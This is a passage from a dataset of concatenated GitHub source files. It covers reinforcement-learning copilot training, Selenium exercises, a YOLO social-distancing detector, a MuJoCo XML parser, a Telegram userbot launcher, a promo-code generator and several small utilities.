f = open(base_dir + \"/base.txt\", \"w\")\n f.write('\\n'.join([str(x) for x in zip(pilot_names, mean_rewards, outcome_distrns)]))\n f.close()\n\n pilot_tol_of_id = {\n 'noop': 0,\n 'laggy': 0.7,\n 'noisy': 0.3,\n 'sensor': 0.1\n }\n\n copilot_of_training_pilot = {}\n\n for training_pilot_id, training_pilot_tol in pilot_tol_of_id.items():\n training_pilot_policy = eval('%s_pilot_policy' % training_pilot_id)\n config_kwargs = {\n 'pilot_policy': training_pilot_policy,\n 'pilot_tol': training_pilot_tol,\n 'reuse': True,\n 'copilot_scope': 'co_deepq_' + training_pilot_id\n }\n print(training_pilot_id)\n co_env = LunarLanderEmpowerment(empowerment=empowerment, ac_continuous=False, **config_kwargs)\n copilot_policy = CoPilotPolicy(base_dir)\n copilot_policy.learn(co_env, max_timesteps=max_ep_len * n_training_episodes, **config_kwargs)\n copilot_of_training_pilot[training_pilot_id] = copilot_policy\n\n cross_evals={}\n\n for training_pilot_id, training_pilot_tol in pilot_tol_of_id.items():\n # load pretrained copilot\n training_pilot_policy = eval('%s_pilot_policy' % training_pilot_id)\n config_kwargs = {\n 'pilot_policy': training_pilot_policy,\n 'pilot_tol': training_pilot_tol,\n 'reuse': True\n }\n\n # evaluate copilot with different pilots\n for eval_pilot_id, eval_pilot_tol in pilot_tol_of_id.items():\n eval_pilot_policy = eval('%s_pilot_policy' % eval_pilot_id)\n copilot_policy = copilot_of_training_pilot[training_pilot_id]\n\n co_env_eval = LunarLanderEmpowerment(empowerment=0, ac_continuous=False, pilot_policy=eval_pilot_policy)\n cross_evals[(training_pilot_id, eval_pilot_id)] = list(zip(*[run_ep_copilot(copilot_policy, co_env_eval, pilot=eval_pilot_policy, pilot_tol=eval_pilot_tol, render=False, max_ep_len=max_ep_len)[:2] for _ in\n range(n_eval_eps)]))\n\n f = open(base_dir + \"/cross_eval.txt\", \"w\")\n\n for key, value in cross_evals.items():\n mean_rewards = np.mean(value[0])\n outcome_distrns = Counter(value[1])\n\n f.write('\\n Training pilot: {}, eval pilot: {}'.format(key[0], key[1]))\n f.write(' Mean reward: ' + str(mean_rewards))\n f.write(' Outcome distribution: '+ str(outcome_distrns))\n\n f.close()\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Empowerment Lander Testbed')\n\n parser.add_argument('--exp_title', type=str, default='', help='Title for experiment')\n parser.add_argument('--mode', type=str, default='local',\n help='Mode for running the experiments - local: runs on local machine, '\n 'ec2: runs on AWS ec2 cluster (requires a proper configuration file)')\n parser.add_argument('--empowerment', type=float, default=100.0,\n help='Empowerment coefficient')\n parser.add_argument('--seed', type=int, default=1, help='Seed')\n args = parser.parse_args()\n\n local_mount = mount.MountLocal(local_dir=config.BASE_DIR, pythonpath=True)\n docker_mount_point = os.path.join(config.DOCKER_MOUNT_DIR, EXP_NAME)\n\n sweeper = launcher.DoodadSweeper([local_mount], docker_img=config.DOCKER_IMAGE,\n docker_output_dir=docker_mount_point,\n local_output_dir=os.path.join(config.DATA_DIR, 'local', EXP_NAME))\n sweeper.mount_out_s3 = mount.MountS3(s3_path='', mount_point=docker_mount_point, output=True)\n\n if args.mode == 'ec2':\n if query_yes_no(\"Continue?\"):\n sweeper.run_sweep_ec2(run_experiment, {'empowerment':[0.001], 'exp_title': [''], 'seed':[1]}, bucket_name=config.S3_BUCKET_NAME,\n instance_type='c4.2xlarge',\n region='us-west-1', s3_log_name=EXP_NAME, add_date_to_logname=True)\n elif args.mode == 'local_docker':\n mode_docker = dd.mode.LocalDocker(\n image=sweeper.image,\n )\n run_sweep_doodad(run_experiment, {'empowerment':[100.0]}, run_mode=mode_docker,\n mounts=sweeper.mounts)\n else:\n run_experiment(empowerment=args.empowerment, exp_title=args.exp_title + '_' + str(args.seed))","repo_name":"yuqingd/ave","sub_path":"empowerment_lander/run_scripts/train_copilot.py","file_name":"train_copilot.py","file_ext":"py","file_size_in_byte":8904,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"30837076519","text":"# 在百度首页上通过CSS标签定位方式定位input标签,并且证明首个input标签是name属性值为ie 的标签\n# from selenium import webdriver\n# import time\n# driver = webdriver.Firefox()\n#\n# url = \"https://www.baidu.com/\"\n# driver.get(url)\n#\n# el_input = driver.find_element_by_css_selector(\"input\")\n# print(el_input.get_attribute(\"name\"))\n#\n# time.sleep(2)\n# driver.close()\n# 使用CSS定位方式依次访问sample_test,html中的元素,\n# # 1.div1使用id定位方式\n# # 2.div1中 p1中的a标签采用层级定位方式(多层级定位)\n# # 3.最后一个a标签应该采用何种定位方式?\n#\n# from selenium import webdriver\n# import time\n# driver = webdriver.Firefox()\n# url = \"file:///C:/Users/liuqun/Desktop/css_example.html\"\n# driver.get(url)\n#\n\n\nfrom selenium import webdriver\nimport time\ndriver = webdriver.Firefox()\nurl = \"file:///C:/Users/liuqun/Desktop/css_example.html\"\ndriver.get(url)\nel_input = driver.find_element_by_css_selector(\"#div1\")\nprint(el_input.get_attribute(\"id\"))\n# el_div1 = driver.find_element_by_css_selector(\"#div1 a\")\n# print(el_div1.get_attribute(\"name\"))\nel_input = driver.find_element_by_css_selector(\"div p a\")\nprint(el_input.get_attribute(\"text\"))\n\nel_input = driver.find_element_by_css_selector(\"#div2+a\")\nprint(el_input.get_attribute(\"text\"))\n\ntime.sleep(3)\ndriver.close()\n\n\n\n","repo_name":"liuqun5050/myScript","sub_path":"自动化/自动化第二天作业.py","file_name":"自动化第二天作业.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70742287128","text":"import json\nimport os \ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n__version__ = \"1.0.19\"\n\nf = open(f\"{dir_path}/config/rula.json\")\nrula_config = json.load(f)\nf.close()\n\nf = open(f\"{dir_path}/config/reba.json\")\nreba_config = json.load(f)\nf.close()\n\nf = open(f\"{dir_path}/config/niosh.json\")\nniosh_config = json.load(f)\nf.close()\n\nf = open(f\"{dir_path}/config/handstrain.json\")\nhandstrain_config = json.load(f)\nf.close()\n\nf = open(f\"{dir_path}/config/skeleton.json\")\nskeleton_config = json.load(f)\nf.close()\n","repo_name":"diwgan32/tumeke","sub_path":"pytumeke/src/pytumeke/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"42094557050","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\nimport string \nfrom jproperties import Properties\n\nparser = argparse.ArgumentParser(description=\"Replace text with env variables\")\nparser.add_argument(\"envfile\",type=open)\nparser.add_argument(\"infile\",type=open)\nparser.add_argument(\"outfile\",type=open,nargs='?')\nargs = parser.parse_args()\n\n\ndef export(file_name,values,new_file_name=\"standart output\"):\n\n t=\"\"\n try:\n content=file_name.read()\n print(\"I've read content\")\n t = string.Template(content).substitute(values)\n if new_file_name == \"standart output\":\n print(t)\n else:\n with open(new_file_name.name,\"w+\") as f:\n f.write(t)\n print(\"I've exported lines\")\n except Exception:\n print(\"Unknown error\")\n\ndef parser():\n values = Properties()\n try:\n values.load(args.envfile)\n except Exception:\n print(\"Occurred exception\")\n if args.outfile:\n export(args.infile,values,args.outfile)\n else:\n export(file_name=args.infile,values=values)\n print(\"Success!\")\n \n\n\nif __name__==\"__main__\":\n if len(sys.argv) >= 2:\n parser()\n else:\n print(\"Call {} -h\".format(argv[0]))\n\n","repo_name":"m-tiapko/taskspace","sub_path":"argsparser/argparser.py","file_name":"argparser.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38387551438","text":"\"\"\"Command-line interface to Kajiki to render a single template.\"\"\"\n\nimport argparse\nimport os\nimport site\nimport sys\n\nimport kajiki.loader\n\n\ndef _kv_pair(pair):\n \"\"\"Convert a KEY=VALUE string to a 2-tuple of (KEY, VALUE).\n\n This is intended for usage with the type= argument to argparse.\n \"\"\"\n key, sep, value = pair.partition(\"=\")\n if not sep:\n raise argparse.ArgumentTypeError(\n \"Expected a KEY=VALUE pair, got {}\".format(pair)\n )\n return key, value\n\n\ndef main(argv=None):\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\n \"-m\",\n \"--mode\",\n dest=\"force_mode\",\n choices=[\"text\", \"xml\", \"html\", \"html5\"],\n help=(\n \"Force a specific templating mode instead of auto-detecting \"\n \"based on extension.\"\n ),\n )\n parser.add_argument(\n \"-i\",\n \"--path\",\n action=\"append\",\n dest=\"paths\",\n default=[],\n metavar=\"path\",\n help=(\n \"Add to the file loader's include paths. For the package \"\n \"loader, this will add the path to Python's site directories.\"\n ),\n )\n parser.add_argument(\n \"-v\",\n \"--var\",\n action=\"append\",\n dest=\"template_variables\",\n default=[],\n type=_kv_pair,\n metavar=\"KEY=VALUE\",\n help=\"Template variables, passed as KEY=VALUE pairs.\",\n )\n parser.add_argument(\n \"-p\",\n \"--package\",\n dest=\"loader_type\",\n action=\"store_const\",\n const=kajiki.loader.PackageLoader,\n default=kajiki.loader.FileLoader,\n help=\"Load based on package name instead of file path.\",\n )\n parser.add_argument(\n \"file_or_package\",\n help=\"Filename or package to load.\",\n )\n parser.add_argument(\n \"output_file\",\n type=argparse.FileType(\"w\"),\n default=sys.stdout,\n nargs=\"?\",\n help=\"Output file. If unspecified, use stdout.\",\n )\n\n opts = parser.parse_args(argv)\n\n loader_kwargs = {}\n if opts.loader_type is kajiki.loader.PackageLoader:\n for path in opts.paths:\n site.addsitedir(path)\n else:\n opts.paths.append(os.path.dirname(opts.file_or_package) or \".\")\n loader_kwargs[\"path\"] = opts.paths\n\n loader = opts.loader_type(force_mode=opts.force_mode, **loader_kwargs)\n template = loader.import_(opts.file_or_package)\n result = template(dict(opts.template_variables)).render()\n opts.output_file.write(result)\n\n # Close the output file to avoid a ResourceWarning during unit\n # tests on Python 3.4+. But don't close stdout, just flush it\n # instead.\n if opts.output_file is sys.stdout:\n opts.output_file.flush()\n else:\n opts.output_file.close()\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:]) # pragma: no cover\n","repo_name":"jackrosenthal/kajiki","sub_path":"kajiki/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"31"} +{"seq_id":"1890096895","text":"# This is the custom module with pre-trained YOLO object detector\r\nimport numpy as np\r\nimport cv2\r\nimport time\r\n\r\nclass Social():\r\n # all initilaizations with loading of the coco model and weights\r\n def __init__(self):\r\n self.weights = \"./yolo-coco/yolov3.weights\"\r\n self.config = \"./yolo-coco/yolo.cfg\"\r\n self.labelsPath = \"./yolo-coco/coco.names\"\r\n\r\n # checking the distance between pairs of centroids of rectangles\r\n def Check_distance(self, a, b):\r\n dist = ((a[0] - b[0]) ** 2 + 550 / ((a[1] + b[1]) / 2) * (a[1] - b[1]) ** 2) ** 0.5\r\n calibration = (a[1] + b[1]) / 2\r\n if 0 < dist < 0.25 * calibration:\r\n return True\r\n else:\r\n return False\r\n # setting up the lables and processing the file to get classes from coco-names\r\n def Setup(self):\r\n self.LABELS = open(self.labelsPath).read().strip().split(\"\\n\")\r\n self.net = cv2.dnn.readNetFromDarknet(self.config, self.weights)\r\n self.ln = self.net.getLayerNames()\r\n self.ln = [self.ln[i[0] - 1] for i in self.net.getUnconnectedOutLayers()]\r\n\r\n # Processing the exact frame for the calculation of the centroid after detecting the persons and locating them in the same frame\r\n def ImageProcess(self, image):\r\n\r\n (H, W) = (None, None)\r\n frame = image.copy()\r\n if W is None or H is None:\r\n (H, W) = frame.shape[:2]\r\n blob = cv2.dnn.blobFromImage(frame, 1 / 255.0, (416, 416), swapRB=True, crop=False)\r\n self.net.setInput(blob)\r\n starttime = time.time()\r\n\r\n # This is detection using SSD-Net\r\n layerOutputs = self.net.forward(self.ln)\r\n stoptime = time.time()\r\n print(\"Video is Getting Processed at {:.4f} seconds per frame\".format((stoptime - starttime)))\r\n confidences = []\r\n outline = []\r\n\r\n for output in layerOutputs:\r\n for detection in output:\r\n scores = detection[5:]\r\n maxi_class = np.argmax(scores)\r\n confidence = scores[maxi_class]\r\n if self.LABELS[maxi_class] == \"person\":\r\n if confidence > 0.5:\r\n box = detection[0:4] * np.array([W, H, W, H])\r\n (centerX, centerY, width, height) = box.astype(\"int\")\r\n x = int(centerX - (width / 2))\r\n y = int(centerY - (height / 2))\r\n outline.append([x, y, int(width), int(height)])\r\n confidences.append(float(confidence))\r\n\r\n box_line = cv2.dnn.NMSBoxes(outline, confidences, 0.5, 0.3)\r\n\r\n if len(box_line) > 0:\r\n flat_box = box_line.flatten()\r\n pairs = []\r\n center = []\r\n status = []\r\n for i in flat_box:\r\n (x, y) = (outline[i][0], outline[i][1])\r\n (w, h) = (outline[i][2], outline[i][3])\r\n center.append([int(x + w / 2), int(y + h / 2)])\r\n status.append(False)\r\n\r\n for i in range(len(center)):\r\n for j in range(len(center)):\r\n close = self.Check_distance(center[i], center[j])\r\n\r\n if close:\r\n pairs.append([center[i], center[j]])\r\n status[i] = True\r\n status[j] = True\r\n index = 0\r\n\r\n for i in flat_box:\r\n (x, y) = (outline[i][0], outline[i][1])\r\n (w, h) = (outline[i][2], outline[i][3])\r\n if status[index] == True:\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 150), 2)\r\n elif status[index] == False:\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n index += 1\r\n # Drawing line between centroids if the boxes are closed to each other\r\n for h in pairs:\r\n cv2.line(frame, tuple(h[0]), tuple(h[1]), (0, 0, 255), 2)\r\n processedImg = frame.copy()\r\n return processedImg # Returning the processed frame after drawing the boxes around the persons and indicating if the rules violated\r\n","repo_name":"sachinlodhi/Social-Dest_Detection","sub_path":"yolo_module.py","file_name":"yolo_module.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30524194631","text":"class Node:\n def __init__(self,initdata):\n self.data=initdata\n self.next=None\n\n def getdata(self):\n return self.data\n def getnext(self):\n return self.next\n\n def setdata(self,newdata):\n self.data=newdata\n def setnext(self,newnext):\n self.next=newnext\n\nclass UnorderedList:\n def __init__(self):\n self.head=None\n self.length=0\n def __str__(self):\n out='['\n current=self.head\n while current!=None:\n out=out+str(current.getdata())+','\n current=current.getnext()\n if out=='[':\n return '[]'\n else:\n out=out[:-1]+']'\n return out\n def slice(self,start,end):\n out = '['\n current = self.head\n for i in range(start):\n current=current.getnext()\n for i in range(end-start):\n out = out + str(current.getdata()) + ','\n current = current.getnext()\n if out=='[':\n return '[]'\n else:\n out=out[:-1]+']'\n return out\n def isempty(self):\n return self.head==None\n def add(self,newdata):\n temp=Node(newdata)\n temp.setnext(self.head)\n self.head=temp\n self.length+=1\n def search(self,target):\n found=False\n current=self.head\n while current!=None and found==False:\n if current.getdata()==target:\n found=True\n current=current.getnext()\n return found\n def remove(self,target):\n found = False\n current = self.head\n previous=None\n while current != None and found == False:\n if current.getdata() == target:\n if previous!=None:\n previous.setnext(current.getnext())\n else:\n self.head=current.getnext()\n found = True\n else:\n previous=current\n current = current.getnext()\n if found:\n self.length-=1\n return found\n\n#test\nmylist=UnorderedList()\nmylist.add(31)\nmylist.add(11)\nmylist.add(21)\nmylist.add(4)\nmylist.add(54)\nmylist.remove(31)\nmylist.remove(11)\nmylist.search(31)","repo_name":"neil-n-zhang/data-structures-using-python","sub_path":"Chapter3/3-13_17list.py","file_name":"3-13_17list.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18501166919","text":"from json import load, dumps\nfrom string import ascii_letters, digits, punctuation\nfrom secrets import choice\n\ndef check_promo(promo_code, data):\n '''\n Проверка промо-кода на сущуствование в файле\n '''\n fl = False\n for item in data:\n item = dict(item)\n fl = promo_code in item['promo'] \n if fl:\n promo_code = generate_promo()\n promo_code = check_promo(promo_code, data)\n if not fl:\n return promo_code\n\ndef get_json_promo(quantity, name, path = 'checker/data_promo.json'):\n '''\n Генерация кода в файл\n '''\n list_promo = []\n context = {}\n data = False\n\n #Проверка кода\n try:\n with open(path, 'r') as f:\n data = load(f)\n except(Exception):\n pass\n\n for _ in range(quantity):\n promo_code = generate_promo()\n\n if data:\n promo_code = check_promo(promo_code, data)\n \n list_promo.append(promo_code)\n\n # Создание или вставка следующих кодов\n if list_promo:\n try:\n context[\"name\"] = name\n context[\"promo\"] = list_promo\n with open(path, 'r+') as f:\n if data:\n text = ',' + dumps(context)\n f.seek(0, 2)\n f.seek(f.tell()-1, 0)\n f.write(text)\n f.seek(0, 2)\n f.write(']')\n\n except(FileNotFoundError):\n with open(path, 'w') as f:\n text = dumps([context])\n f.write(text)\n\n#Генератор случайных символов\ndef generate_promo():\n alphabet = ascii_letters + digits + punctuation\n return ''.join(choice(alphabet) for i in range(8))","repo_name":"VladislavPopovM/Generate_promo","sub_path":"checker/core_generate_promo.py","file_name":"core_generate_promo.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20152894338","text":"from collections import OrderedDict\nfrom decimal import getcontext\nfrom os.path import abspath, dirname, join, exists\nfrom mujoco_worldgen.transforms import closure_transform\n\nimport numpy as np\nimport xmltodict\nimport os\n\nfrom mujoco_worldgen.util.types import accepts, returns\nfrom mujoco_worldgen.util.path import worldgen_path\nfrom mujoco_worldgen.parser.normalize import normalize, stringify\n\ngetcontext().prec = 4\n\n'''\nThis directory should contain all XML string processing.\nNo other files should be manually converting types for XML processing.\nAPI:\n parse_file() - takes in path to mujoco file and returns normalized dictionary\n unparse_dict() - takes in an xml dictionary and returns an XML string\nNOTE FOR TRANSFORMS:\n The internal xml_dict layout passed into transforms is the one returned by\n normalize() -- see that docstring for more details on its layout.\nEvery other method should be considered internal!\n'''\n\n\n@accepts(str, bool)\n@returns(OrderedDict)\ndef parse_file(xml_path, enforce_validation=True):\n '''\n Reads xml from xml_path, consolidates all includes in xml, and returns\n a normalized xml dictionary. See preprocess()\n '''\n # TODO: use XSS or DTD checking to verify XML structure\n with open(xml_path) as f:\n xml_string = f.read()\n\n xml_doc_dict = xmltodict.parse(xml_string.strip())\n assert 'mujoco' in xml_doc_dict, \"XML must contain node\"\n xml_dict = xml_doc_dict['mujoco']\n assert isinstance(xml_dict, OrderedDict), \\\n \"Invalid node type {}\".format(type(xml_dict))\n preprocess(xml_dict, xml_path, enforce_validation=enforce_validation)\n return xml_dict\n\n\n@accepts(OrderedDict)\n@returns(str)\ndef unparse_dict(xml_dict):\n '''\n Convert a normalized XML dictionary into a XML string. See stringify().\n Note: this modifies xml_dict in place to have strings instead of values.\n '''\n stringify(xml_dict)\n xml_doc_dict = OrderedDict(mujoco=xml_dict)\n return xmltodict.unparse(xml_doc_dict, pretty=True)\n\n\n@accepts(OrderedDict, str, bool)\ndef preprocess(xml_dict, root_xml_path, enforce_validation=True):\n '''\n All the steps to turn XML into Worldgen readable form:\n - normalize: changes strings to floats / vectors / bools, and\n turns consistently nodes to OrderedDict and List\n - name_meshes: some meshes are missing names. Here we give default names.\n - rename_defaults: some defaults are global, we give them names so\n they won't be anymore.\n - extract_includes: recursively, we extract includes and merge them.\n - validate: we apply few final checks on the structure.\n '''\n normalize(xml_dict)\n set_absolute_paths(xml_dict, root_xml_path)\n extract_includes(xml_dict, root_xml_path, enforce_validation=enforce_validation)\n if enforce_validation:\n validate(xml_dict)\n\n\n@accepts(OrderedDict, str)\ndef set_absolute_paths(xml_dict, root_xml_path):\n dirnames = [\"@meshdir\", \"@texturedir\"]\n if \"compiler\" in xml_dict:\n for drname in dirnames:\n if drname in xml_dict[\"compiler\"]:\n asset_dir = worldgen_path('assets') + '/'\n path = xml_dict[\"compiler\"][drname]\n if path[0] != \"/\":\n relative_path = os.path.dirname(root_xml_path) + \"/\" + path\n xml_dict[\"compiler\"][drname] = os.path.abspath(relative_path)\n elif path.find(asset_dir) > -1:\n xml_dict[\"compiler\"][drname] = worldgen_path(\n 'assets', path.split(asset_dir)[-1])\n\n\n@accepts(OrderedDict, str, bool)\ndef extract_includes(xml_dict, root_xml_path, enforce_validation=True):\n '''\n extracts \"include\" xmls and substitutes them.\n '''\n def transform_include(node):\n if \"include\" in node:\n if isinstance(node[\"include\"], OrderedDict):\n node[\"include\"] = [node[\"include\"]]\n include_xmls = []\n for include_dict in node[\"include\"]:\n include_path = include_dict[\"@file\"]\n if not exists(include_path):\n include_path = join(dirname(abspath(root_xml_path)), include_path)\n assert exists(include_path), \"Cannot include file: %s\" % include_path\n with open(include_path) as f:\n include_string = f.read()\n include_xml = xmltodict.parse(include_string.strip())\n closure_transform(transform_include)(include_xml)\n assert \"mujocoinclude\" in include_xml, \"Missing .\"\n include_xmls.append(include_xml[\"mujocoinclude\"])\n del node[\"include\"]\n for include_xml in include_xmls:\n preprocess(include_xml, root_xml_path, enforce_validation=enforce_validation)\n update_mujoco_dict(node, include_xml)\n closure_transform(transform_include)(xml_dict)\n\n\n@accepts(OrderedDict, OrderedDict)\n@returns(None.__class__)\ndef update_mujoco_dict(dict_a, dict_b):\n '''\n Update mujoco dict_a with the contents of another mujoco dict_b.\n '''\n other = (str, int, float, np.ndarray, tuple)\n for key, value in dict_b.items():\n if key not in dict_a:\n dict_a[key] = value\n elif isinstance(dict_a[key], list):\n assert isinstance(value, list), \"Expected %s to be a list\" % value\n dict_a[key] += value\n elif isinstance(value, other):\n assert(isinstance(dict_a[key], other))\n assert dict_a[key] == value, \"key=%s\\n,Trying to merge dictionaries. \" \\\n \"They don't agree on value: %s vs %s\" % (key, dict_a[key], value)\n else:\n assert isinstance(dict_a[key], OrderedDict), \"dict_a = %s\\nkey=%s\\nExpected dict_a[key] to be a OrderedDict.\" % (dict_a, key)\n assert(isinstance(value, OrderedDict))\n update_mujoco_dict(dict_a[key], value)\n\n\n@accepts(OrderedDict)\ndef validate(xml_dict):\n '''\n If we make assumptions elsewhere in XML processing, then they should be\n enforced here.\n '''\n # Assumption: radians for angles, \"xyz\" euler angle sequence, etc.\n\n values = {'@coordinate': 'local',\n '@angle': 'radian',\n '@eulerseq': 'xyz'}\n for key, value in values.items():\n if key in xml_dict:\n assert value == xml_dict[key], 'Invalid value for \\\"%s\\\". We support only \\\"%s\\\"' % (key, value)\n\n # Assumption: all meshes have name\n if \"asset\" in xml_dict and \"mesh\" in xml_dict[\"asset\"]:\n for mesh in xml_dict[\"asset\"][\"mesh\"]:\n assert \"@name\" in mesh, \"%s is missing name\" % mesh\n\n # Assumption: none all the default classes is global.\n if \"default\" in xml_dict:\n for key, value in xml_dict[\"default\"].items():\n assert key == \"default\", \"Dont use global variables in default %s %s\" % (key, value)\n\n # Assumption: all joints have name.\n def assert_joint_names(node):\n if \"joint\" in node:\n for joint in node[\"joint\"]:\n assert \"@name\" in joint, \"Missing name for %s\" % joint\n\n if \"worldbody\" in xml_dict:\n closure_transform(assert_joint_names)(xml_dict[\"worldbody\"])\n","repo_name":"Replicable-MARL/MARLlib","sub_path":"marllib/patch/hns/mujoco-worldgen/mujoco_worldgen/parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":7238,"program_lang":"python","lang":"en","doc_type":"code","stars":627,"dataset":"github-code","pt":"31"} +{"seq_id":"40709204361","text":"#!/bin/python\n\n#Library Import Statements\nimport numpy as np\nimport sys\n\n#Name of Data File\nDat_File = str(sys.argv[1])\n\n#Read in Data File\ndata = np.genfromtxt(Dat_File)\n\n#Comutation of Lift to Drag Ratio\nLDR = data[:,1]/data[:,2]\n\n#Location of Maximum Lift to Drag Ratio\nLDR_M_Loc = np.argmax(LDR)\n\n#Maximum Lift to Drag Ratio\nLDR_Max = LDR[LDR_M_Loc]\n\n#Angle of Attack which Max L/D Occurs\nalpha_LDR_Max = data[LDR_M_Loc, 0]\n\nprint(\"#Alpha L/D Max (deg) | L/D max Value\")\nprint(alpha_LDR_Max, LDR_Max)\n","repo_name":"GingerGengar/Stability_Control","sub_path":"Programming/Comp_Trim_Angle.py","file_name":"Comp_Trim_Angle.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19539426218","text":"# -*- coding: utf-8 -*-\nimport os\nimport datetime\n\nid_debug = False\n\ndef log(str):\n if id_debug:\n print(str)\n\ndef mkdir(path):\n\n folder = os.path.exists(path)\n\n if not folder: #判断是否存在文件夹如果不存在则创建为文件夹\n\n os.makedirs(path) #makedirs 创建文件时如果路径不存在会创建这个路径\n\ndef mkcrashfile(path):\n\n current_path = os.path.abspath(path)\n\n father_path = os.path.abspath(os.path.dirname(current_path) + os.path.sep + \".\")\n\n crash_path = father_path + os.path.sep + 'log'\n\n mkdir(crash_path) \n\n # datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n\n # os.mknod(father_path)\n\n return crash_path\n\ndef mkzz1file(filename):\n\n# zz1 = os.path.exists(filename)\n\n# if zz1:\n\n# os.remove(filename)\n\n ZZ1file = open(filename,'a+')\n\n return ZZ1file\n\n\n\ndef write_format(file,name,edata):\n\n if (edata > 0):\n file.write(name + ' %.7e' % (edata))\n else: \n file.write(name + ' %.7e' % (edata))\n \ndef write_log_info(filename,logInfo):\n\n current_path = os.path.abspath(filename)\n\n father_path = os.path.abspath(os.path.dirname(current_path) + os.path.sep + \".\")\n\n info_path = father_path + os.path.sep + 'dataInfo'\n\n mkdir(info_path) \n\n filename = info_path + os.path.sep + os.path.basename(filename) + '_info.txt'\n\n info = open(filename,'w+')\n\n info.write(logInfo)\n\n info.close()\n\ndef write(filename,datas):\n\n ZZ1file = mkzz1file(filename)\n\n for key,values in datas.items():\n write_format(ZZ1file,key,values.es)\n ZZ1file.write('\\n')\n\n ZZ1file.close()\n\n","repo_name":"caowen2211891/SouthernUSAFM","sub_path":"FileWriter.py","file_name":"FileWriter.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21948455807","text":"import logging\nimport os\nimport atexit\nimport sys\nimport asyncio\nimport subprocess\n\nimport pyrogram\nfrom pyrogram import types\nfrom pyrogram.methods.utilities.idle import idle\n\nfrom . import auth, database, loader, utils, extrapatchs\n\n\nasync def main():\n \"\"\"Main function\"\"\"\n\n me, app, tapp = await auth.Auth().authorize()\n\n await app.initialize()\n\n db = database.db\n\n modules = loader.ModulesManager(app, db, me)\n extrapatchs.MessageMagic(types.Message)\n\n if utils.is_tl_enabled():\n asyncio.ensure_future(tapp.start())\n app.tl = tapp\n else:\n app.tl = \"Not enabled\"\n\n await modules.load(app)\n\n if not db.get(\"shizu.me\", \"me\", None):\n id_ = (await app.get_me()).id\n db.set(\"shizu.me\", \"me\", id_)\n\n if pyrogram.__version__ != \"2.0.106.21\":\n logging.info(\"Installing shizu-pyrogram...\")\n\n subprocess.run(\n \"pip install https://github.com/AmoreForever/Shizu-Pyro/archive/dev.zip --force-reinstall\",\n shell=True,\n check=True,\n )\n\n logging.info(\"Successfully installed shizu-pyrogram!\")\n logging.info(\"Restarting...\")\n\n return atexit.register(os.execl(sys.executable, sys.executable, \"-m\", \"shizu\"))\n\n await idle()\n\n logging.info(\"Shizu is shutting down...\")\n return True\n","repo_name":"AmoreForever/Shizu","sub_path":"shizu/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"22849366481","text":"def solution(triangle):\n answer = 0\n m = [[0 for col in range(row + 1)] for row in range(len(triangle))]\n \n m[0] = triangle[0]\n \n for i in range(1, len(triangle)):\n for j in range(0, i + 1):\n for d in [0, -1]:\n nj = d + j\n if(0 <= nj <= i - 1):\n m[i][j] = max(m[i][j], triangle[i][j] + m[i - 1][nj])\n \n answer = (max(m[len(m) - 1]))\n \n return answer","repo_name":"jinukeu/Algorithm","sub_path":"프로그래머스/lv3/43105. 정수 삼각형/정수 삼각형.py","file_name":"정수 삼각형.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41498888916","text":"from blog.models import users, posts\n\n\ndef login_required(fn):\n def wrapper(*args, **kwargs):\n if \"user\" in session:\n return fn(*args, **kwargs)\n else:\n print(\"u must login\")\n\n return wrapper\n\n\ndef authenticate(**kwargs):\n username = kwargs.get(\"username\") # .get used for avoid error:it return none\n email = kwargs.get(\"email\")\n user_data = [user for user in users if user['username'] == username and user['email'] == email]\n return user_data\n\n\ndef logged_user():\n username = session.get(\"user\")\n userid = [user[\"id\"] for user in users if user[\"name\"] == username][0]\n return userid\n\n\nsession = {}\n\n\nclass SigninView:\n def post(self, *args, **kwargs):\n user_name = kwargs.get(\"username\")\n email = kwargs.get(\"email\")\n user = authenticate(username=user_name, email=email)\n if user:\n print(\"sucess\")\n session[\"user\"] = user_name\n else:\n print(\"invalid credentials\")\n\n\n@login_required\ndef logout(*args, **kwargs):\n session.pop(\"user\")\n\n\nclass PostListView:\n @login_required\n def get(self, *args, **kwargs):\n return posts\n\n\nclass MyPostsView:\n @login_required\n def get(self, *args, **kwargs):\n userid = logged_user()\n qs = [p for p in posts if p.get(\"userId\") == userid][0]\n return qs\n\n\nclass PostCreateView:\n @login_required\n def post(self, *args, **kwargs):\n userId = logged_user()\n 